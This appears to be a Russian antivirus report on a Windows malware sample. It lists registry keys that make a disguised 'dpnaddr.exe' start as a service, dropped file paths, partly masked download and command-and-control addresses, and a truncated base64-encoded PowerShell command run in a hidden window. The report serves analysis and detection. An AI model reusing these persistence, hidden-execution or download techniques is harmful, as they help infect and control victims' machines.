Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\dpnaddr] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dpnaddr] 'ImagePath' = '"%WINDIR%\SysWOW64\d3dx10_37\dpnaddr.exe"'
- 'dpnaddr' "%WINDIR%\SysWOW64\d3dx10_37\dpnaddr.exe"
- 'dpnaddr' %WINDIR%\SysWOW64\d3dx10_37\dpnaddr.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD...
- %TEMP%\word\2019\zlcoy_4.exe
- %WINDIR%\syswow64\d3dx10_37\dpnaddr.exe
- %TEMP%\word\2019\zlcoy_4.exe в %WINDIR%\syswow64\d3dx10_37\dpnaddr.exe
- '17#.#1.218.65':80
- http://ca###oomz.com/wp-includes/rPG/
- http://17#.#1.218.65/zxr2xYwYD/naz4THDrZHl6KJ6P/3DHXXQurD9/ffMf5wcQ1LVdNV8o/L9n6kYFB0bYx/H6KiSYnYHYoph/
- DNS ASK ca###oomz.com
- '%TEMP%\word\2019\zlcoy_4.exe'
- '%WINDIR%\syswow64\d3dx10_37\dpnaddr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAG8AaQA3AHgAagAwAD0AKAAoACcATgAzACcAKwAnAGIAZwAnACkAKwAoACcAcwAnACsAJwBjAHMAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AFQAZQBtAHAAXABXAE8AUgBEAFwAMgAwAD...' (со скрытым окном)